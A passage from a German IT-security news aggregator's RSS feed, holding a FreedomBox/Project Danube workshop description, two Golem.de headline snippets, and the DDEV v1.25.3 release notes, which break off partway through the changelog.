</item>
<item>
<title><![CDATA[Project Danube / FreedomBox (ds2012)]]></title>
<description><![CDATA[In diesem Workshop wird das "FreedomBox"-Projekt vorgestellt, dabei handelt es sich um sogenannte "Plug Computer", die einfach an eine Steckdose angesteckt werden können und dann für mehr Privatsphäre und mehr Kontrolle über die eigenen persönlichen Daten im Internet sorgen sollen. So kann die Fr...]]></description>
<link>https://tsecurity.de/de/3650449/it-security-video/project-danube-freedombox-ds2012/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650449/it-security-video/project-danube-freedombox-ds2012/</guid>
<pubDate>Tue, 07 Jul 2026 06:03:23 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In diesem Workshop wird das &quot;FreedomBox&quot;-Projekt vorgestellt, dabei handelt es sich um sogenannte &quot;Plug Computer&quot;, die einfach an eine Steckdose angesteckt werden können und dann für mehr Privatsphäre und mehr Kontrolle über die eigenen persönlichen Daten im Internet sorgen sollen. So kann die FreedomBox beispielsweise gewisse Tracking-Scripts der Werbeindustrie filtern und dadurch die allgegenwärtige Überwachung des Surfverhaltens etwas lindern. Weiters kann man die FreedomBox als &quot;persönlichen Datenspeicher&quot; verwenden, was bedeutet dass man seine persönlichen Daten nicht mit unbekannten Risiken in der &quot;Cloud&quot; ablegt, sondern sicher und kontrolliert bei sich zu Hause. Das Ziel des FreedomBox-Projekts ist es letztlich, dezentrale Alternativen zu großen und sehr stark zentralisierten Internet-Diensten zu schaffen. Während des Workshops werden einige FreedomBoxen vorhanden sein, die selbst getestet werden können.

Das FreedomBox-Projekt wurde aus der Überlegung geboren, dass stark zentralisierte Internet-Dienste wie Google und Facebook eine enorme Ansammlung von persönlichen Daten zur Folge haben, was wiederum zu Kontrolle, Macht und Missbrauchspotenzial führt.

Von FreedomBox-Gründer Eben Moglen stammt der Ausspruch, dass Facebook inzwischen mehr Daten über Menschen gesammelt hat, als das alle totalitären Regimen das 20. Jahrhunderts geschafft haben. Das Weltwirtschaftsforum bezeichnet in einem Bericht persönliche Daten als das neue Öl des 21 Jahrhunderts. Die Europäische Union sieht persönliche Daten als potenzielle Quelle für einen Aufschwung und sogar Weg aus der Wirtschaftskrise. In manchen Ländern können persönliche Daten in den falschen Händen zu Folter und Tod führen.

Netzpolitische Fragen rund um persönliche Daten sind hochaktuell. In diesen Bereich fallen zum Beispiel Themen wie die Vorratsdatenspeicherung und die Netzneutralität. Immer mehr Menschen haben das Gefühl, dass persönliche Daten im Internet weder vom Staat noch von kalifornischen Unternehmen abgefangen und ausgewertet werden sollten.

Ein möglicher Ansatz scheint zu sein, dezentrale Netzwerke verschiedener Ausprägung zu schaffen, in denen entweder mehrere Dienstanbieter zur Auswahl stehen, oder sogar jeder Teilnehmer quasi nach dem BitTorrent-Prinzip sein eigener Anbieter sein kann. Dies ist das Ziel der FreedomBox. In einem solchen System ist Privatsphäre nicht nur ein Schlagwort, sondern tief in der technischen Architektur verankert.

Inzwischen gibt es eine offizielle Version 0.1 der FreedomBox-Software, die z.B. Tracking-Scripts und Werbebanner mittels der Softwarepakete &quot;Privoxy&quot;, &quot;AdBlock Plus&quot;, und &quot;HTTP Everywhere&quot; filtern kann.





The idea of the FreedomBox is to produce a small electronic device (a mini computer) that enables private, encrypted communication over the Internet. While the project is only at an early stage, there are many ideas and visions on what such a device could be used for, e.g. for avoiding surveillance and circumventing censorship. Myself, I have experimented with such ideas in the context of Project Danube, an open source project that has worked on decentralized communication for several years.

This workshop will give a live demonstration of 4 Guruplug mini computers that can act as FreedomBoxes. After plugging them into a power outlet, they will automatically connect to each other and form a peer-to-peer network. They can be controlled via a web interface. The peer-to-peer network makes it possible to send messages and share personal data between the Guruplugs.

During the last few months, I have been to several conferences and demonstrated what such mini computers could be used for, e.g. at the Internet Identity Workshop in Mountain View, California, and at the European Identity Conference in Munich, Germany.

At those events, the scenario of the demo was as follows:

1.    The Guruplugs were handed out to volunteer participants and plugged into power outlets.
2.    Upon being plugged in, these small personal servers booted their Debian operating system and custom Project Danube demo software.
3.    The volunteer participants of the demo were able to control their box via a web interface.
4.    The first step to perform was to connect one’s box to the other boxes (using a button on the web interface).
5.    The second step was to sign in to the network with an identifier (using a Distributed Hash Table), in order for boxes to be able to find each other.
6.    After being connected and identified, the demo allowed participants to do the following:
7.    Enter personal data which is stored in an XDI-based Personal Data Store on the box (first name, last name, email, etc.)
8.    Establish a relationship with other participants, which allowed access to the personal data on their boxes via XDI Messaging.
9.    Sending text messages from one box to another.
10.   Sending an “intent” to all boxes on the network (via multicasting), indicating what one would be willing to buy at a given price.
11.   Viewing “intents” received from the network.

During the workshop, we will perform the above steps. Attendants can borrow one of the Guruplugs and participate, and we can have a discussion on the technology and the potential uses of such a mini computer.

Project Danube is an open-source project offering software for identity and personal data services on the Internet. The core of this project is an XDI-based Personal Data Store - a semantic database for your personal data, which always remains under your control. Applications on top of this database include the Federated Social Web, the selective sharing of personal data with organizations, and experimental peer-to-peer communication architectures. The efforts of this project reflect ongoing discourse about political and social questions about anonymity vs. veronymity, centralization vs. decentralization, and the appropriate handling of personal data online.
about this event: https://datenspuren.de/2012/fahrplan/events/5003.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Scattered Spider: 19-Jähriger Hacker mittels Windows-ID getrackt - Golem.de]]></title>
<description><![CDATA[... Hacking mit Kali Linux (E-Learning) · zum Kurs. LDAP Identitätsmanagement ... Hacking & Security: Das umfassende Handbuch bei Amazon Affiliate ...]]></description>
<link>https://tsecurity.de/de/3650198/hacking/scattered-spider-19-jaehriger-hacker-mittels-windows-id-getrackt-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650198/hacking/scattered-spider-19-jaehriger-hacker-mittels-windows-id-getrackt-golemde/</guid>
<pubDate>Tue, 07 Jul 2026 02:36:05 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Hacking</b> mit Kali Linux (E-Learning) · zum Kurs. LDAP Identitätsmanagement ... <b>Hacking</b> &amp; Security: Das umfassende Handbuch bei Amazon Affiliate ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Oura Ring 5 im Test: Kann ein Ring heute schon die Sportuhr ersetzen? - Golem.de]]></title>
<description><![CDATA[Tagesform versus Body Battery · Seminar: OT-Security Manager (TÜV) nach IEC 62443 · E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux ( ...]]></description>
<link>https://tsecurity.de/de/3649781/it-security-nachrichten/oura-ring-5-im-test-kann-ein-ring-heute-schon-die-sportuhr-ersetzen-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649781/it-security-nachrichten/oura-ring-5-im-test-kann-ein-ring-heute-schon-die-sportuhr-ersetzen-golemde/</guid>
<pubDate>Mon, 06 Jul 2026 22:07:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tagesform versus Body Battery · Seminar: OT-<b>Security</b> Manager (TÜV) nach IEC 62443 · E-Learning: <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux ( ...]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.25.3]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use sudo apt-get update && sudo apt-get install ddev, see apt/yum installation
Windows and WSL2: Download the Windows Installer; you can run it for inst...]]></description>
<link>https://tsecurity.de/de/3649770/downloads/v1253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649770/downloads/v1253/</guid>
<pubDate>Mon, 06 Jul 2026 22:01:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>sudo apt-get update &amp;&amp; sudo apt-get install ddev</code>, see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://ddev.com/download/" rel="nofollow">Windows Installer</a>; you can run it for install or upgrade.<br>
<g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> <strong>Traditional Windows users (not WSL2)</strong>: If needed, the installer will prompt you to uninstall the previous system-wide installation to avoid conflicts with the new per-user installation.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>Highlights</h2>
<p>Blog announcement: <a href="https://ddev.com/blog/release-v1-25-3/" rel="nofollow">https://ddev.com/blog/release-v1-25-3/</a></p>
<ul>
<li><strong>New Docker Compose library:</strong> Improved UX during <code>ddev start</code> and <code>ddev stop</code>; the separate <code>~/.ddev/bin/docker-compose</code> binary is no longer needed and can be removed</li>
<li><strong>Faster <code>ddev start</code>:</strong> Reduced startup time by running post-healthcheck tasks concurrently, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a></li>
<li><strong>Faster <code>ddev stop</code>:</strong> Fixed a bug in the webserver startup script that added an unnecessary ~10-second delay</li>
<li><strong>MariaDB 12.3 LTS support</strong></li>
<li><strong>Podman and Docker rootless are no longer experimental:</strong> Both are now stable and ready for general use:
<ul>
<li><a href="https://docs.ddev.com/en/stable/users/install/docker-installation/#macos-podman-rootless" rel="nofollow">macOS (Podman rootless)</a></li>
<li><a href="https://docs.ddev.com/en/stable/users/install/docker-installation/#linux-docker-rootless" rel="nofollow">Linux/WSL2 (Docker rootless)</a></li>
<li><a href="https://docs.ddev.com/en/stable/users/install/docker-installation/#linux-podman-rootless" rel="nofollow">Linux/WSL2 (Podman rootless)</a></li>
</ul>
</li>
</ul>
<h2>Breaking Changes</h2>
<ul>
<li>Remove support for <code>XDG_CONFIG_HOME</code>, replaced by <code>DDEV_XDG_CONFIG_HOME</code>. Support for <code>~/.config/ddev</code> on Linux is unchanged. This change was needed because some IDEs, such as PhpStorm, don't always see <code>XDG_CONFIG_HOME</code> set in the terminal (see <a href="https://youtrack.jetbrains.com/projects/IJPL/issues/IJPL-1055/Load-interactive-shell-environment-variables-on-Linux" rel="nofollow">this issue</a>), which caused the IDE to recreate the <code>~/.ddev</code> directory repeatedly</li>
<li>Use stricter permissions for world-writable directories inside <code>ddev-webserver</code>. If you had <code>post-start</code> hooks that wrote to <code>/usr/local/bin</code>, update them to use <code>~/.local/bin</code> instead, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>Move <code>N_PREFIX</code> from <code>/usr/local</code> to <code>/usr/local/n</code>. This shouldn't affect most people, unless you referenced a full path such as <code>/usr/local/bin/npm</code> - the new location is <code>/usr/local/n/bin/npm</code>, or simply use <code>npm</code> without a full path</li>
<li>Remove the <code>ddev dr</code> alias for <code>ddev drush</code>, since <code>dr</code> is now a built-in command for Drupal 11.4+</li>
</ul>
<h2>Features</h2>
<ul>
<li><a href="https://docs.ddev.com/en/stable/users/configuration/config/#nodejs_version" rel="nofollow">Node.js improvements</a>: preserve <code>nodejs_version</code> in <code>.ddev/config.yaml</code>, and install several Node.js versions with <code>n install &lt;version&gt;</code> inside the web container</li>
<li>Docker rootless on Linux no longer requires <code>no-bind-mounts</code>; disable it with <code>ddev config global --no-bind-mounts=false</code></li>
<li>Support the <a href="https://github.com/moby/moby/releases/tag/docker-v29.5.0">gvisor-tap-vsock</a> network driver in Docker rootless</li>
<li>Add new <a href="https://docs.ddev.com/en/stable/users/usage/commands/#dr" rel="nofollow"><code>ddev dr</code></a> command for Drupal 11.4+</li>
<li>Allow using Mutagen together with <code>ddev config global --use-hardened-images=true</code></li>
<li><code>ddev version</code> and <code>ddev config</code> now work even when Docker isn't running or is broken, and <code>ddev poweroff</code> shows progress output instead of appearing to hang</li>
<li>Improve <code>ddev list</code> and <code>ddev describe</code> layout on narrow terminals</li>
<li>Add OSC 8 terminal hyperlink support to <code>ddev list</code>, <code>ddev describe</code>, <code>ddev add-on list</code>, and <code>ddev add-on search</code></li>
<li>Show human-readable output when checking available disk space, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wolcen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wolcen">@wolcen</a></li>
<li>Always pull images when using <code>ddev start --no-cache</code></li>
<li>Respect the <code>COMPOSER_NO_BLOCKING</code> environment variable from the host in <code>ddev composer</code></li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/configuration/config/#docker_buildx_version" rel="nofollow"><code>ddev config global --docker-buildx-version</code></a> to specify which Docker Buildx version to use (advanced use only)</li>
<li>Respect <code>docker-buildx</code> installed via snap on Linux</li>
<li>Support Debian, Kali, and eLxr WSL2 distros in the Windows installer, and avoid installing <code>docker-ce</code> over an existing Docker Desktop <code>docker</code> binary</li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/usage/commands/#utility-addon-update-checker" rel="nofollow"><code>ddev utility addon-update-checker</code></a> command for add-on maintainers</li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/extend/creating-add-ons/#interactive-actions" rel="nofollow"><code>#ddev-interactive</code></a> option for add-on actions, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a></li>
<li>Add <a href="https://docs.ddev.com/en/stable/users/extend/custom-docker-services/#omitting-comddev-labels-from-a-service" rel="nofollow"><code>x-ddev.omit-ddev-labels</code></a> extension to skip <code>com.ddev.*</code> label injection for specific services</li>
<li>Support the Flatpak user binary for DBeaver on Linux, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickchomey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickchomey">@nickchomey</a></li>
<li>Add a <a href="https://docs.ddev.com/en/stable/users/quickstart/#drupal-drupal-12-head" rel="nofollow">quickstart for Drupal 12 (HEAD)</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a></li>
<li>Add troubleshooting for <a href="https://docs.ddev.com/en/stable/users/topics/hosting/#lets-encrypt-errors" rel="nofollow">Let's Encrypt certificate failures</a>, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonpugh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonpugh">@jonpugh</a></li>
</ul>
<h2>Bug Fixes</h2>
<ul>
<li>Windows installer: fix installation on WSL2 Ubuntu 26.04, which previously failed due to the deprecated <code>wslu</code> package</li>
<li>Suppress 404 logs for <code>favicon.ico</code> and <code>robots.txt</code>; in some cases these caused Nginx to run a PHP script twice</li>
<li>Prevent recursion in global web command wrappers</li>
<li>Use the correct <code>settings.ddev.php</code> for each Drupal version</li>
<li>Fix a bug where <code>.ddev/apache/apache-site.conf</code> went missing when using a custom Nginx config</li>
<li>Detect a missing <code>docker</code> CLI, which is required when using Mutagen</li>
<li>Limit the <code>ENV HOME=""</code> workaround for MySQL 8.x to the database context only</li>
<li>Podman and macOS: restrict the <code>keep-id</code> userns setting to Linux only</li>
<li>Use the <code>nodejs_version</code> set during the <code>ddev-webserver</code> image build; if you installed global <code>npm</code> packages in <code>post-start</code> hooks, move them to <a href="https://docs.ddev.com/en/stable/users/extend/customizing-images/#adding-extra-dockerfiles-for-webimage-and-dbimage" rel="nofollow">extra Dockerfiles</a> instead</li>
<li>Use wrapper scripts in <code>ddev-dbserver</code> to avoid <code>mysql</code> deprecation warnings with MariaDB 11.x+</li>
<li>Warn when the <code>CAROOT</code> environment variable is set but the mkcert CA files (needed for HTTPS in your browser) are inaccessible</li>
<li>Normalize <code>OSTYPE</code> detection on Linux, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mikee-3000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mikee-3000">@Mikee-3000</a></li>
<li>Avoid double-sourcing bashrc configuration in <code>ddev ssh</code></li>
<li>Skip OS-generated metadata files (<code>.DS_Store</code>, <code>Thumbs.db</code>, <code>desktop.ini</code>) during custom-config detection and in <code>.ddev/.gitignore</code></li>
<li>Restore path autocompletion for <code>ddev add-on get</code></li>
<li>Don't prompt to run <code>ddev poweroff</code> after updating <code>ddev-ssh-agent</code></li>
<li>Fix a case typo in <code>ddev sequelace</code> so Sequel Ace is detected on case-sensitive macOS filesystems, thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mficzel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mficzel">@mficzel</a></li>
</ul>
<h2>Internal Changes</h2>
<ul>
<li>Migrate <a href="https://docs.ddev.com/" rel="nofollow">DDEV documentation</a> from <a href="https://squidfunk.github.io/mkdocs-material/" rel="nofollow">Material for MkDocs</a> to <a href="https://zensical.org/" rel="nofollow">Zensical</a></li>
<li>Upgrade Bubble Tea (<code>ddev tui</code>) to v2</li>
<li>Add light/dark/system preference variants for the <a href="https://docs.ddev.com/en/stable/developers/brand-guide/" rel="nofollow">brand logo</a></li>
<li>Remove automated testing on macOS Intel; macOS amd64 binaries are still built and distributed, only CI testing on Intel hardware is removed</li>
<li>Add automated testing for macOS Podman rootless</li>
<li>Improve the test embargo system for Go, Bats, and CI workflows; tests can now be <a href="https://docs.ddev.com/en/stable/developers/maintainers/#skipping-tests" rel="nofollow">skipped</a> when needed</li>
<li>Add custom GitHub workflows to run tests on branches without opening a PR</li>
<li>Rework local HTTP test helpers for clearer failure output</li>
<li>Remove the build step for the Docker image used in <code>ddev auth ssh</code></li>
<li>Bump all Go dependencies</li>
</ul>
<h2>Minor Updates</h2>
<ul>
<li>PHP 8.4.22 and 8.5.7</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>test: Reenable Drupal 12 bats test (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308873453" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8346" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8346/hovercard" href="https://github.com/ddev/ddev/pull/8346">#8346</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308873453" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8346" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8346/hovercard" href="https://github.com/ddev/ddev/pull/8346">#8346</a></li>
<li>chore(claude): fix PreToolUse hook matcher for git commit static analysis (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304236248" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8345" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8345/hovercard" href="https://github.com/ddev/ddev/pull/8345">#8345</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304236248" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8345" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8345/hovercard" href="https://github.com/ddev/ddev/pull/8345">#8345</a></li>
<li>docs(add-ons): Minor updates to creating-add-ons.md by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311162289" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8347" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8347/hovercard" href="https://github.com/ddev/ddev/pull/8347">#8347</a></li>
<li>perf: combined startup time optimizations, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3892114614" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8096" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8096/hovercard" href="https://github.com/ddev/ddev/issues/8096">#8096</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3941786572" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8145" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8145/hovercard" href="https://github.com/ddev/ddev/pull/8145">#8145</a></li>
<li>fix(windows): remove wslu from installer, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276951921" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8326" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8326/hovercard" href="https://github.com/ddev/ddev/issues/8326">#8326</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335618741" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8351" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8351/hovercard" href="https://github.com/ddev/ddev/pull/8351">#8351</a></li>
<li>fix(webserver): replace phar.io/filippo.io links with GitHub releases, improve Dockerfile, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794142159" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8012" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8012/hovercard" href="https://github.com/ddev/ddev/issues/8012">#8012</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337118936" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8352" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8352/hovercard" href="https://github.com/ddev/ddev/pull/8352">#8352</a></li>
<li>docs(quickstart): add a quickstart for Drupal 12 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344681076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8357" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8357/hovercard" href="https://github.com/ddev/ddev/pull/8357">#8357</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rpkoller/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rpkoller">@rpkoller</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344681076" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8357" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8357/hovercard" href="https://github.com/ddev/ddev/pull/8357">#8357</a></li>
<li>feat(docker): always pull images with <code>--no-cache</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349539661" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8363" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8363/hovercard" href="https://github.com/ddev/ddev/pull/8363">#8363</a></li>
<li>fix(download-images): pull webserver image, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231897705" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8304" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8304/hovercard" href="https://github.com/ddev/ddev/pull/8304">#8304</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344757488" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8358" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8358/hovercard" href="https://github.com/ddev/ddev/pull/8358">#8358</a></li>
<li>fix(start): use image digest for rebuild detection, fix rand and ssh-agent data races, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3941786572" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8145" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8145/hovercard" href="https://github.com/ddev/ddev/pull/8145">#8145</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345335786" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8359" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8359/hovercard" href="https://github.com/ddev/ddev/pull/8359">#8359</a></li>
<li>fix(test): skip TestCheckLiveConnectivityWithProject on Rancher/Colima/Lima, fix misleading WSL2 labels by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351827772" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8365" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8365/hovercard" href="https://github.com/ddev/ddev/pull/8365">#8365</a></li>
<li>docs(windows): add WSL2 installation step to Docker docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343533724" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8355" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8355/hovercard" href="https://github.com/ddev/ddev/pull/8355">#8355</a></li>
<li>chore: fix claude hooks and update agent docs [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359138300" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8370" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8370/hovercard" href="https://github.com/ddev/ddev/pull/8370">#8370</a></li>
<li>chore: remove macOS amd64 CI testing (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359689994" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8372" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8372/hovercard" href="https://github.com/ddev/ddev/pull/8372">#8372</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359689994" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8372" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8372/hovercard" href="https://github.com/ddev/ddev/pull/8372">#8372</a></li>
<li>fix(drupal): use configured project type for settings.php version selection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353481878" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8366" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8366/hovercard" href="https://github.com/ddev/ddev/pull/8366">#8366</a></li>
